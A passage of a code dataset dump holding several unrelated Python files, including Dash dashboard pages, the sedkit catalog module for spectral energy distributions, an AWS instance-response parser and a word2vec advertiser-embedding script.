md=4,\n)\n\ncolumn2 = dbc.Col(\n [ \n html.H2('Estimated rent in Paris: ', className='mb-5'), \n html.Div(id='prediction-content', className='lead', style={'fontSize': 40}), \n \n ]\n)\n\n\nlayout = dbc.Row([column1, 
column2])\n\n@app.callback(\n Output('prediction-content', 'children'),\n [Input('neighbourhood', 'value'),\n Input('latitude', 'value'),\n Input('longitude', 'value'),\n Input('room_type', 'value'),\n Input('minimum_nights', 'value')],\n)\ndef predict( neighbourhood, latitude, longitude, room_type, minimum_nights):\n df = pd.DataFrame(\n data=[[neighbourhood, latitude, longitude, room_type, minimum_nights]], \n columns=['neighbourhood', 'latitude', 'longitude','room_type', 'minimum_nights']\n )\n y_pred = pipeline.predict(df)[0]\n price_pred = np.expm1(y_pred)\n return f'${price_pred:.0f} '\n","sub_path":"pages/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"166692841","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objs as go\n\nfrom app import app\nimport pandas as pd\n\ndata = pd.read_excel('data/2018/economic-aggregates/S1.6.xlsx')\nyears = data.iloc[5:6, 2:-2]\n\nprocess = data[7:]\nsections = process.iloc[:, 0]\nmain_sections = [index for index in sections.index if sections[index].isdigit()]\nrows = [data.iloc[idx] for idx in main_sections]\nlabels = [row.iloc[-1] for row in rows]\nlabelIds = main_sections\n\nlayout = html.Div([\n html.H1('GVA Time Series'),\n dcc.Dropdown(\n id='my-dropdown',\n options=[{'label': category, 'value': labelIds[idx]} for (idx, category) in enumerate(labels)],\n value=labelIds[-1],\n style={'margin-bottom': '20px'}\n ),\n dcc.Graph(id='gva-time-series',\n style={'padding-top': '20px'})\n], className=\"container\")\n\n\n@app.callback(Output('gva-time-series', 'figure'),\n [Input('my-dropdown', 'value')])\ndef update_graph(selected_dropdown_value):\n index = int(selected_dropdown_value)\n row = data.iloc[index][2:-2]\n year_list = ['Y ' + year for year in years.values[0]]\n mid = int(len(row) / 2)\n return {\n 'data': [go.Bar(\n x=year_list[:mid],\n y=row[:mid],\n name='Current Price'\n ), go.Bar(\n x=year_list[mid:],\n y=row[mid:],\n name='Constant Price'\n )],\n 'layout': {\n 'title': data.iloc[index][-1]\n }\n }\n","sub_path":"apps/gva_time_series.py","file_name":"gva_time_series.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"397004362","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Joe Filippazzo, jfilippazzo@stsci.edu\n#!python3\n\"\"\"\nA module to produce a catalog of spectral energy distributions\n\"\"\"\n\nimport os\nimport pickle\nfrom copy import copy\nimport shutil\n\nfrom astropy.io import ascii\nimport astropy.table as at\nimport astropy.units as q\nimport numpy as np\nfrom bokeh.models import HoverTool, ColumnDataSource, LabelSet\nfrom bokeh.plotting import figure, show\nfrom bokeh.models.glyphs import Patch\n\nfrom .sed import SED\nfrom . 
import utilities as u\n\n\nclass Catalog:\n \"\"\"An object to collect SED results for plotting and analysis\"\"\"\n def __init__(self, name='SED Catalog', marker='circle', color='blue', verbose=True, **kwargs):\n \"\"\"Initialize the Catalog object\"\"\"\n # Metadata\n self.verbose = verbose\n self.name = name\n self.marker = marker\n self.color = color\n self.wave_units = q.um\n self.flux_units = q.erg/q.s/q.cm**2/q.AA\n\n # List all the results columns\n self.cols = ['name', 'ra', 'dec', 'age', 'age_unc', 'distance', 'distance_unc',\n 'parallax', 'parallax_unc', 'radius', 'radius_unc',\n 'spectral_type', 'spectral_type_unc', 'SpT',\n 'membership', 'reddening', 'fbol', 'fbol_unc', 'mbol',\n 'mbol_unc', 'Lbol', 'Lbol_unc', 'Lbol_sun',\n 'Lbol_sun_unc', 'Mbol', 'Mbol_unc', 'logg', 'logg_unc',\n 'mass', 'mass_unc', 'Teff', 'Teff_unc', 'Teff_evo',\n 'Teff_evo_unc', 'Teff_bb', 'SED']\n\n # A master table of all SED results\n self.results = self.make_results_table(self)\n\n # Try to set attributes from kwargs\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n def __add__(self, other, name=None):\n \"\"\"Add two catalogs together\n\n Parameters\n ----------\n other: sedkit.catalog.Catalog\n The Catalog to add\n\n Returns\n -------\n sedkit.catalog.Catalog\n The combined catalog\n \"\"\"\n if not type(other) == type(self):\n raise TypeError('Cannot add object of type {}'.format(type(other)))\n\n # Make a new catalog\n new_cat = Catalog(name=name or self.name)\n\n # Combine results\n new_results = at.vstack([at.Table(self.results), at.Table(other.results)])\n new_cat.results = new_results\n\n return new_cat\n\n def add_column(self, name, data, unc=None):\n \"\"\"\n Add a column of data to the results table\n\n Parameters\n ----------\n name: str\n The name of the new column\n data: sequence\n The data array\n unc: sequence (optional)\n The uncertainty array\n \"\"\"\n # Make sure column doesn't exist\n if name in self.results.colnames:\n raise ValueError(\"{}: Column already exists.\".format(name))\n\n # Make sure data is the right length\n if len(data) != len(self.results):\n raise ValueError(\"{} != {}: Data is not the right size for this catalog.\".format(len(data), len(self.results)))\n\n # Add the column\n self.results.add_column(data, name=name)\n\n # Add uncertainty column\n if unc is not None:\n\n # Uncertainty name\n name = name + '_unc'\n\n # Make sure column doesn't exist\n if name in self.results.colnames:\n raise ValueError(\"{}: Column already exists.\".format(name))\n\n # Make sure data is the right length\n if len(unc) != len(self.results):\n raise ValueError(\n \"{} != {}: Data is not the right size for this catalog.\".format(len(unc), len(self.results)))\n\n # Add the column\n self.results.add_column(unc, name=name)\n\n def add_SED(self, sed):\n \"\"\"Add an SED to the catalog\n\n Parameters\n ----------\n sed: sedkit.sed.SED\n The SED object to add\n \"\"\"\n # Turn off print statements\n sed.verbose = False\n\n # Check the units\n sed.wave_units = self.wave_units\n sed.flux_units = self.flux_units\n\n # Run the SED\n sed.make_sed()\n\n # Add the values and uncertainties if applicable\n new_row = {}\n for col in self.cols[:-1]:\n\n if col + '_unc' in self.cols:\n if isinstance(getattr(sed, col), tuple):\n val = getattr(sed, col)[0]\n else:\n val = None\n elif col.endswith('_unc'):\n if isinstance(getattr(sed, col.replace('_unc', '')), tuple):\n val = getattr(sed, col.replace('_unc', ''))[1]\n else:\n val = None\n else:\n val = getattr(sed, col)\n\n val = 
val.to(self.results[col.replace('_unc', '')].unit).value if hasattr(val, 'unit') else val\n\n new_row[col] = val\n\n # Add the SED\n new_row['SED'] = sed\n\n # Append apparent and absolute photometry\n for row in sed.photometry:\n\n # Add the column to the results table\n if row['band'] not in self.results.colnames:\n self.results.add_column(at.Column([np.nan] * len(self.results), dtype=np.float16, name=row['band']))\n self.results.add_column(at.Column([np.nan] * len(self.results), dtype=np.float16, name=row['band'] + '_unc'))\n self.results.add_column(at.Column([np.nan] * len(self.results), dtype=np.float16, name='M_' + row['band']))\n self.results.add_column(at.Column([np.nan] * len(self.results), dtype=np.float16, name='M_' + row['band'] + '_unc'))\n\n # Add the apparent magnitude\n new_row[row['band']] = row['app_magnitude']\n\n # Add the apparent uncertainty\n new_row[row['band'] + '_unc'] = row['app_magnitude_unc']\n\n # Add the absolute magnitude\n new_row['M_' + row['band']] = row['abs_magnitude']\n\n # Add the absolute uncertainty\n new_row['M_' + row['band'] + '_unc'] = row['abs_magnitude_unc']\n\n # Add the new row\n self.results.add_row(new_row)\n\n self.message(\"Successfully added SED '{}'\".format(sed.name))\n\n def export(self, parentdir='.', dirname=None, format='ipac', sources=True, zipped=False):\n \"\"\"\n Exports the results table and a directory of all SEDs\n\n Parameters\n ----------\n parentdir: str\n The parent directory for the folder or zip file\n dirname: str (optional)\n The name of the exported directory or zip file, default is SED name\n format: str\n The format of the output results table\n sources: bool\n Export a directory of all source SEDs too\n zipped: bool\n Zip the directory\n \"\"\"\n # Check the parent directory\n if not os.path.exists(parentdir):\n raise IOError('No such target directory', parentdir)\n\n # Check the target directory\n name = self.name.replace(' ', '_')\n dirname = dirname or name\n dirpath = os.path.join(parentdir, dirname)\n\n # Remove '.' from column names\n final = at.Table(self.results).filled(np.nan)\n for col in final.colnames:\n final.rename_column(col, col.replace('.', '_'))\n\n # Write a directory of results and all SEDs...\n if sources:\n\n # Make a directory\n if not os.path.exists(dirpath):\n os.system('mkdir {}'.format(dirpath))\n else:\n raise IOError('Directory already exists:', dirpath)\n\n # Export the results table\n resultspath = os.path.join(dirpath, '{}_results.txt'.format(name))\n final.write(resultspath, format=format)\n\n # Make a sources directory\n sourcedir = os.path.join(dirpath,'sources')\n os.system('mkdir {}'.format(sourcedir))\n\n # Export all SEDs\n for source in self.results['SED']:\n source.export(sourcedir)\n\n # zip if desired\n if zipped:\n shutil.make_archive(dirpath, 'zip', dirpath)\n os.system('rm -R {}'.format(dirpath))\n\n # ...or just write the results table\n else:\n resultspath = dirpath + '_results.txt'\n final.write(resultspath, format=format)\n\n def filter(self, param, value):\n \"\"\"Retrieve the filtered rows\n\n Parameters\n ----------\n param: str\n The parameter to filter by, e.g. 'Teff'\n value: str, float, int, sequence\n The criteria to filter by, \n which can be single valued like 1400\n or a range with operators [<,<=,>,>=],\n e.g. 
(>1200,<1400), ()\n\n Returns\n -------\n sedkit.sed.Catalog\n The filtered catalog\n \"\"\"\n # Make a new catalog\n cat = Catalog()\n cat.results = u.filter_table(self.results, **{param: value})\n\n return cat\n\n def from_file(self, filepath, run_methods=['find_2MASS'], delimiter=','):\n \"\"\"Generate a catalog from a file of source names and coordinates\n\n Parameters\n ----------\n filepath: str\n The path to an ASCII file\n run_methods: list\n A list of methods to run\n delimiter: str\n The column delimiter of the ASCII file\n \"\"\"\n # Get the table of sources\n data = ascii.read(filepath, delimiter=delimiter)\n\n self.message(\"Generating SEDs for {} sources from {}\".format(len(data), filepath))\n\n # Iterate over table\n for row in data:\n\n # Make the SED\n s = SED(row['name'], verbose=False)\n if 'ra' in row and 'dec' in row:\n s.sky_coords = row['ra']*q.deg, row['dec']*q.deg\n\n # Run the desired methods\n s.run_methods(run_methods)\n\n # Add it to the catalog\n self.add_SED(s)\n\n def get_data(self, *args):\n \"\"\"Fetch the data for the given columns\n \"\"\"\n results = []\n\n for x in args:\n\n # Get the data\n if '-' in x:\n x1, x2 = x.split('-')\n if self.results[x1].unit != self.results[x2].unit:\n raise TypeError('Columns must be the same units.')\n\n xunit = self.results[x1].unit\n xdata = self.results[x1] - self.results[x2]\n xerror = np.sqrt(self.results['{}_unc'.format(x1)]**2 + self.results['{}_unc'.format(x2)]**2)\n\n else:\n xunit = self.results[x].unit\n xdata = self.results[x]\n xerror = self.results['{}_unc'.format(x)]\n\n # Append to results\n results.append([xdata, xerror, xunit])\n\n return results\n\n def get_SED(self, name_or_idx):\n \"\"\"Retrieve the SED for the given object\n\n Parameters\n ----------\n idx_or_name: str, int\n The name or index of the SED to get\n \"\"\"\n # Add the index\n self.results.add_index('name')\n\n # Get the rows\n if isinstance(name_or_idx, str) and name_or_idx in self.results['name']:\n return copy(self.results.loc[name_or_idx]['SED'])\n\n elif isinstance(name_or_idx, int) and name_or_idx <= len(self.results):\n return copy(self.results[name_or_idx]['SED'])\n\n else:\n self.message('Could not retrieve SED {}'.format(name_or_idx))\n\n return\n\n def load(self, file):\n \"\"\"Load a saved Catalog\"\"\"\n if os.path.isfile(file):\n\n f = open(file)\n cat = pickle.load(f)\n f.close()\n\n f = open(file, 'rb')\n cat = pickle.load(f)\n f.close()\n\n self.results = cat\n\n @staticmethod\n def make_results_table(self):\n \"\"\"Generate blank results table\"\"\"\n results = at.QTable(names=self.cols, dtype=['O'] * len(self.cols))\n results.add_index('name')\n\n # Set the units\n results['age'].unit = q.Gyr\n results['age_unc'].unit = q.Gyr\n results['distance'].unit = q.pc\n results['distance_unc'].unit = q.pc\n results['parallax'].unit = q.mas\n results['parallax_unc'].unit = q.mas\n results['radius'].unit = q.Rsun\n results['radius_unc'].unit = q.Rsun\n results['fbol'].unit = q.erg / q.s / q.cm ** 2\n results['fbol_unc'].unit = q.erg / q.s / q.cm ** 2\n results['Lbol'].unit = q.erg / q.s\n results['Lbol_unc'].unit = q.erg / q.s\n results['mass'].unit = q.Msun\n results['mass_unc'].unit = q.Msun\n results['Teff'].unit = q.K\n results['Teff_unc'].unit = q.K\n results['Teff_bb'].unit = q.K\n results['Teff_evo'].unit = q.K\n results['Teff_evo_unc'].unit = q.K\n\n return results\n\n def message(self, msg, pre='[sedkit.Catalog]'):\n \"\"\"\n Only print message if verbose=True\n\n Parameters\n ----------\n msg: str\n The message to 
print\n pre: str\n The prefix to print before the message\n \"\"\"\n if self.verbose:\n if pre is None:\n print(msg)\n else:\n print(\"{} {}\".format(pre, msg))\n\n def plot(self, x, y, marker=None, color=None, scale=['linear', 'linear'],\n xlabel=None, ylabel=None, fig=None, order=None, identify=None,\n id_color='red', label_points=False, exclude=None, draw=True, **kwargs):\n \"\"\"Plot parameter x versus parameter y\n\n Parameters\n ----------\n x: str\n The name of the x axis parameter, e.g. 'SpT'\n y: str\n The name of the y axis parameter, e.g. 'Teff'\n marker: str (optional)\n The name of the method for the desired marker\n color: str (optional)\n The color to use for the points\n scale: sequence\n The (x,y) scale for the plot\n xlabel: str\n The label for the x-axis\n ylabel: str\n The label for the y-axis\n fig: bokeh.plotting.figure (optional)\n The figure to plot on\n order: int\n The polynomial order to fit\n identify: idx, str, sequence\n Names of sources to highlight in the plot\n id_color: str\n The color of the identified points\n label_points: bool\n Print the name of the object next to the point\n\n Returns\n -------\n bokeh.plotting.figure.Figure\n The figure object\n \"\"\"\n # Grab the source and valid params\n source = copy(self.source)\n params = [k for k in source.column_names if not k.endswith('_unc')]\n\n # If no uncertainty column for parameter, add it\n if '{}_unc'.format(x) not in source.column_names:\n _ = source.add([None] * len(self.source.data['name']), '{}_unc'.format(x))\n if '{}_unc'.format(y) not in source.column_names:\n _ = source.add([None] * len(self.source.data['name']), '{}_unc'.format(y))\n\n # Check if the x parameter is a color\n if '-' in x and all([i in params for i in x.split('-')]):\n colordata = self.get_data(x)[0]\n if len(colordata) == 3:\n _ = source.add(colordata[0], x)\n _ = source.add(colordata[1], '{}_unc'.format(x))\n params.append(x)\n\n # Check if the y parameter is a color\n if '-' in y and all([i in params for i in y.split('-')]):\n colordata = self.get_data(y)[0]\n if len(colordata) == 3:\n _ = source.add(colordata[0], y)\n _ = source.add(colordata[1], '{}_unc'.format(y))\n params.append(y)\n\n # Check the params are in the table\n if x not in params:\n raise ValueError(\"'{}' is not a valid x parameter. Please choose from {}\".format(x, params))\n if y not in params:\n raise ValueError(\"'{}' is not a valid y parameter. Please choose from {}\".format(y, params))\n\n # Make the figure\n if fig is None:\n\n # Tooltip names can't have '.' 
or '-'\n xname = source.add(source.data[x], x.replace('.', '_').replace('-', '_'))\n yname = source.add(source.data[y], y.replace('.', '_').replace('-', '_'))\n\n # Set up hover tool\n tips = [('Name', '@name'), (x, '@{}'.format(xname)), (y, '@{}'.format(yname))]\n hover = HoverTool(tooltips=tips, names=['points'])\n\n # Make the plot\n TOOLS = ['pan', 'reset', 'box_zoom', 'wheel_zoom', 'save', hover]\n title = '{} v {}'.format(x, y)\n fig = figure(plot_width=800, plot_height=500, title=title, y_axis_type=scale[1], x_axis_type=scale[0], tools=TOOLS)\n\n # # Exclude sources\n # if exclude is not None:\n # exc_idx = [i for i, v in enumerate(source.data['name']) if v in exclude]\n # patches = {x : [(i, np.nan) for i in exc_idx],\n # y : [(i, np.nan) for i in exc_idx]}\n #\n # source.patch(patches)\n\n # Get marker class\n size = kwargs.get('size', 8)\n kwargs['size'] = size\n marker = getattr(fig, marker or self.marker)\n color = color or self.color\n marker(x, y, source=source, color=color, fill_alpha=0.7, name='points', **kwargs)\n\n # Plot y errorbars\n yval, yerr = source.data[y], source.data['{}_unc'.format(y)]\n yval[yval == None] = np.nan\n yerr[yerr == None] = np.nan\n y_err_x = [(i, i) for i in source.data[x]]\n y_err_y = [(i, j) for i, j in zip(yval - yerr, yval + yerr)]\n fig.multi_line(y_err_x, y_err_y, color=color)\n\n # Plot x errorbars\n xval, xerr = source.data[x], source.data['{}_unc'.format(x)]\n xval[xval == None] = np.nan\n xerr[xerr == None] = np.nan\n x_err_y = [(i, i) for i in source.data[y]]\n x_err_x = [(i, j) for i, j in zip(xval - xerr, xval + xerr)]\n fig.multi_line(x_err_x, x_err_y, color=color)\n\n # Label points\n if label_points:\n labels = LabelSet(x=x, y=y, text='name', level='glyph', x_offset=5, y_offset=5, source=source, render_mode='canvas')\n fig.add_layout(labels)\n\n # Fit polynomial\n if isinstance(order, int):\n\n # Only fit valid values\n idx = [n for n, (i, j) in enumerate(zip(xval, yval)) if not hasattr(i, 'mask') and not np.isnan(i) and not hasattr(j, 'mask') and not np.isnan(j)]\n xd = np.array(xval, dtype=float)[idx]\n yd = np.array(yval, dtype=float)[idx]\n\n # Plot data\n label = 'Order {} fit'.format(order)\n xaxis = np.linspace(min(xd), max(xd), 100)\n coeffs = None\n\n # Fit the polynomial\n try:\n\n if yerr is not None:\n ye = np.array(yerr, dtype=float)[idx]\n coeffs, cov = np.polyfit(x=xd, y=yd, deg=order, w=1./ye, cov=True)\n else:\n coeffs, cov = np.polyfit(x=xd, y=yd, deg=order, cov=True)\n\n # Plot the line\n if coeffs is None or any([np.isnan(i) for i in coeffs]):\n self.message(\"Could not fit that data with an order {} polynomial\".format(order))\n else:\n\n # Calculate values and 1-sigma\n TT = np.vstack([xaxis**(order-i) for i in range(order + 1)]).T\n yaxis = np.dot(TT, coeffs)\n C_yi = np.dot(TT, np.dot(cov, TT.T))\n sig = np.sqrt(np.diag(C_yi))\n\n # Plot the line and shaded error\n fig.line(xaxis, yaxis, legend=label + ' {}'.format(coeffs[::-1]), color=color, line_alpha=0.3)\n xpat = np.hstack((xaxis, xaxis[::-1]))\n ypat = np.hstack((yaxis + sig, (yaxis - sig)[::-1]))\n err_source = ColumnDataSource(dict(xaxis=xpat, yaxis=ypat))\n glyph = Patch(x='xaxis', y='yaxis', fill_color=color, line_color=None, fill_alpha=0.1)\n fig.add_glyph(err_source, glyph)\n\n except Exception as exc:\n print(\"Skipping the polynomial fit: {}\".format(exc))\n\n # Set axis labels\n xunit = source.data[x].unit\n yunit = source.data[y].unit\n fig.xaxis.axis_label = '{}{}'.format(x, ' [{}]'.format(xunit) if xunit else '')\n fig.yaxis.axis_label = 
'{}{}'.format(y, ' [{}]'.format(yunit) if yunit else '')\n\n # Formatting\n fig.legend.location = \"top_right\"\n\n # Identify sources\n if isinstance(identify, list):\n id_cat = Catalog('Identified')\n for obj_id in identify:\n obj_result = self.get_SED(obj_id)\n if str(type(obj_result)) != \"\":\n obj_result = [obj_result]\n for obj in obj_result:\n id_cat.add_SED(obj)\n fig = id_cat.plot(x, y, fig=fig, size=size+5, marker='circle', line_color=id_color, fill_color=None, line_width=2, label_points=True)\n del id_cat\n\n if draw:\n show(fig)\n\n return fig\n\n def plot_SEDs(self, name_or_idx, scale=['log', 'log'], normalize=None, **kwargs):\n \"\"\"Plot the SED for the given object or objects\n\n Parameters\n ----------\n idx_or_name: str, int, sequence\n The name or index of the SED to get\n scale: sequence\n The [x, y] scale to plot, ['linear', 'log']\n normalized: bool\n Normalize the SEDs to 1\n \"\"\"\n COLORS = u.color_gen('Category10')\n\n # Plot all SEDS\n if name_or_idx in ['all', '*']:\n name_or_idx = list(range(len(self.results)))\n\n # Make it into a list\n if isinstance(name_or_idx, (str, int)):\n name_or_idx = [name_or_idx]\n\n # Make the plot\n TOOLS = ['pan', 'reset', 'box_zoom', 'wheel_zoom', 'save']\n title = self.name\n fig = figure(plot_width=800, plot_height=500, title=title,\n y_axis_type=scale[1], x_axis_type=scale[0],\n x_axis_label='Wavelength [{}]'.format(self.wave_units),\n y_axis_label='Flux Density [{}]'.format(str(self.flux_units)),\n tools=TOOLS)\n\n # Plot each SED\n for obj in name_or_idx:\n c = next(COLORS)\n targ = self.get_SED(obj)\n fig = targ.plot(fig=fig, color=c, output=True, normalize=normalize, legend=targ.name, **kwargs)\n\n return fig\n\n def remove_SED(self, name_or_idx):\n \"\"\"Remove an SED from the catalog\n\n Parameters\n ----------\n name_or_idx: str, int\n The name or index of the SED to remove\n \"\"\"\n # Add the index\n self.results.add_index('name')\n\n # Get the rows\n if isinstance(name_or_idx, str) and name_or_idx in self.results['name']:\n self.results = self.results[self.results['name'] != name_or_idx]\n\n elif isinstance(name_or_idx, int) and name_or_idx <= len(self.results):\n self.results.remove_row([name_or_idx])\n\n else:\n self.message('Could not remove SED {}'.format(name_or_idx))\n\n return\n\n def save(self, file):\n \"\"\"Save the serialized data\n\n Parameters\n ----------\n file: str\n The filepath\n \"\"\"\n path = os.path.dirname(file)\n\n if os.path.exists(path):\n\n # Make the file if necessary\n if not os.path.isfile(file):\n os.system('touch {}'.format(file))\n\n # Write the file\n f = open(file, 'wb')\n pickle.dump(self.results, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n\n self.message('Catalog saved to {}'.format(file))\n\n @property\n def source(self):\n \"\"\"Generates a ColumnDataSource from the results table\"\"\"\n # Remove SED column\n results_dict = {key: val for key, val in dict(self.results).items() if key != 'SED'}\n\n return ColumnDataSource(data=results_dict)\n","sub_path":"sedkit/catalog.py","file_name":"catalog.py","file_ext":"py","file_size_in_byte":24418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"327385948","text":"import pandas as pd\n\nfrom agents.serializer import AgentsSerializer\n\n\ndef add_data():\n df = pd.read_csv('agents/agents.csv')\n for k in range(len(df)):\n dt = dict(df.loc[k])\n data = AgentsSerializer(data=dt)\n\n if data.is_valid():\n data.save()\n\n return 
\"done\"","sub_path":"agents/add_agents_data.py","file_name":"add_agents_data.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488227480","text":"import argparse\nimport re\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"spec_file\")\nargs = parser.parse_args()\n\nspec_file = args.spec_file\n\nwith open(spec_file) as fh:\n lines = fh.readlines()\n\n# Possible values to search for\n# Name: %{name_name}\n# Name: name_name\nfor line in lines:\n if re.search(\"Name.*:\", line):\n name = line.split(\":\")[1].strip()\n break\nelse:\n print(\"Did not find name in spec file\")\n exit(1)\n\n# If name value is a macro\n# e.g.\n# %global name_name projectname\n# Name: %{name_name}\nif re.search(\"%\\{.+\\}\", name):\n name_ = name.replace(\"%\", \"\").replace(\"{\", \"\").replace(\"}\", \"\")\n for line in lines:\n if \"%global\" in line and name_ in line:\n line_ = re.sub(\" {2,}\", \" \", line.strip())\n name = line.split()[-1]\n break\n\nprint(name)\n","sub_path":"files/artifact-name.py","file_name":"artifact-name.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177525401","text":"n = int(input())\nw = list(map(int, input().split()))\ncenter = sum(w)//2\nsml = 0\ni = 0\nwhile sml < center:\n sml += w[i]\n i += 1\ni -= 1\nsmr = sum(w)-sml\nif sml-smr > smr+w[i]-(sml-w[i]):\n print(smr+w[i]-(sml-w[i]))\nelse:\n print(sml-smr)","sub_path":"ABC/129/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"376352355","text":"from .ResponseParser import *\nfrom ..Util.Tags import *\n\n\n# responsible for parsing describe instances response\nclass DescribeInstancesParser(ResponseParser):\n # sg (security group) is for filtering nodes\n def __init__(self, reponse=None):\n ResponseParser.__init__(self, reponse)\n\n def setResponse(self, response):\n self.response = response\n\n def _getPrivateIp(self, i):\n if not i[\"NetworkInterfaces\"]: return \"N/A\"\n return i[\"NetworkInterfaces\"][0].get(\"PrivateIpAddress\")\n\n def _getPublicIp(self, i):\n if not i[\"NetworkInterfaces\"]: return \"N/A\"\n return i[\"NetworkInterfaces\"][0].get(\"Association\", {\"PublicIp\": \"N/A\"})[\"PublicIp\"]\n\n def _getSecurityGroups(self, i):\n return [j[\"GroupName\"] for j in i[\"SecurityGroups\"]]\n\n def _getTagName(self, i):\n for j in i:\n if j[\"Key\"] == TAG_ROLE: return j[\"Value\"]\n return \"N/A\"\n\n # return list of instances\n def listDetails(self):\n instances = []\n for i in self.response[\"Reservations\"]:\n for j in i[\"Instances\"]:\n instances.append(j)\n return [\n {\n \"InstanceId\": i[\"InstanceId\"],\n \"PublicIp\": self._getPublicIp(i),\n \"PrivateIpAddress\": self._getPrivateIp(i),\n \"Role\": self._getTagName(i.get(\"Tags\", [])),\n \"State\": i.get(\"State\", [{\"Value\": \"N/A\"}])\n }\n for i in instances if i[\"State\"][\"Name\"] not in [\"terminated\", \"shutting-down\"]\n ]\n\n def _getClusterIDs(self, i):\n for j in i:\n if j[\"Key\"] == TAG_CLUSTERID: return j[\"Value\"]\n\n def _getClusterDesc(self,i):\n for j in i:\n if j[\"Key\"] == TAG_CLUSTERDESC: return j[\"Value\"]\n return \"\"\n\n def _getUser(self,i):\n for j in i:\n if j[\"Key\"] == TAG_USER: return j[\"Value\"]\n return \"\"\n\n def listClusterIDs(self):\n instances = []\n 
for i in self.response[\"Reservations\"]:\n            for j in i[\"Instances\"]:\n                instances.append(j)\n        return list(set([\n            (self._getClusterIDs(i.get(\"Tags\", [])), self._getClusterDesc(i.get(\"Tags\",[])), self._getUser(i.get(\"Tags\",[])))\n            for i in instances\n            if i[\"State\"][\"Name\"] not in [\"terminated\", \"shutting-down\"]\n        ]))\n\n    def getClusterDesc(self):\n        instances = []\n        for i in self.response[\"Reservations\"]:\n            for j in i[\"Instances\"]:\n                instances.append(j)\n        tags = instances[0][\"Tags\"]\n        return self._getClusterDesc(tags)\n","sub_path":"server/JmeterAwsConf/Parser/DescribeInstancesParser.py","file_name":"DescribeInstancesParser.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"649824902","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 18 18:42:42 2020\n\n@author: Alamo\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport gensim\nfrom gensim.models.word2vec import Word2Vec\n\npath = '../data/'\ntrain_ad_df = pd.read_csv(path+'train_preliminary/ad.csv', usecols=['creative_id', 'advertiser_id'])\ntest_ad_df = pd.read_csv(path+'test/ad.csv', usecols=['creative_id', 'advertiser_id'])\nwhole_ad_df = pd.concat([train_ad_df, test_ad_df])\nwhole_ad_df = whole_ad_df.drop_duplicates(subset=['creative_id'], keep='first')\ndel train_ad_df, test_ad_df\n\ntrain_click_df = pd.read_csv(path+'train_preliminary/click_log.csv', usecols=['time', 'user_id', 'creative_id'])\ntest_click_df = pd.read_csv(path+'test/click_log.csv', usecols=['time', 'user_id', 'creative_id'])\nwhole_click_df = pd.concat([train_click_df, test_click_df])\n#analysis showed there are no duplicate records\n#whole_click_df = whole_click_df.drop_duplicates(subset=['time', 'user_id', 'creative_id'], keep='first')\ndel train_click_df, test_click_df, whole_click_df['time']\n\nwhole_click_ad_df = pd.merge(whole_click_df, whole_ad_df, how='left', on='creative_id')\n\n#extract each user's clicked-ad sequence and build the corpus\ndoc = whole_click_ad_df.groupby(['user_id'])['advertiser_id'].agg({list}).reset_index()\ndocument = doc['list'].values.tolist()\n\n#convert to strings so the model can train on them\ntexts = [[str(word) for word in doc] for doc in document]\n\nrandom_seed = 2020\nw2v_model = Word2Vec(texts, size=128, window=5, min_count=1, workers=12, sg=1, iter=10, seed=random_seed)\nw2v_model.wv.save_word2vec_format('./word2vec_model/advertiserid_w2v_128.txt')\ndel texts\n\n\n\ndef get_w2v_avg(doc, w2v_out_path, word2vec_Path):\n    w2v_dim = 128\n\n    model = gensim.models.KeyedVectors.load_word2vec_format(\n        word2vec_Path, binary=False)\n    vocab = model.vocab.keys()\n\n    w2v_feature = np.zeros((len(doc), w2v_dim))\n    w2v_feature_avg = np.zeros((len(doc), w2v_dim))\n\n    for i, line in enumerate(doc['list']):\n        num = 0\n        if line == '':\n            w2v_feature_avg[i, :] = np.zeros(w2v_dim)\n        else:\n            for word in line:\n                num += 1\n                vec = model[str(word)] if str(word) in vocab else np.zeros(w2v_dim)\n                w2v_feature[i, :] += vec\n            w2v_feature_avg[i, :] = w2v_feature[i, :] / num\n    w2v_avg = pd.DataFrame(w2v_feature_avg)\n    w2v_avg.columns = ['w2v_avg_' + str(i) for i in range(1, w2v_dim+1)]\n    w2v_avg['user_id'] = doc['user_id']\n    w2v_avg.set_index(keys=['user_id'], inplace=True)\n    w2v_avg.to_csv(w2v_out_path, encoding='utf-8', index=None)\n    return w2v_avg\n\n\nw2v_feat = get_w2v_avg(doc, path+'feature/adid_w2v_avg_feature.csv', 
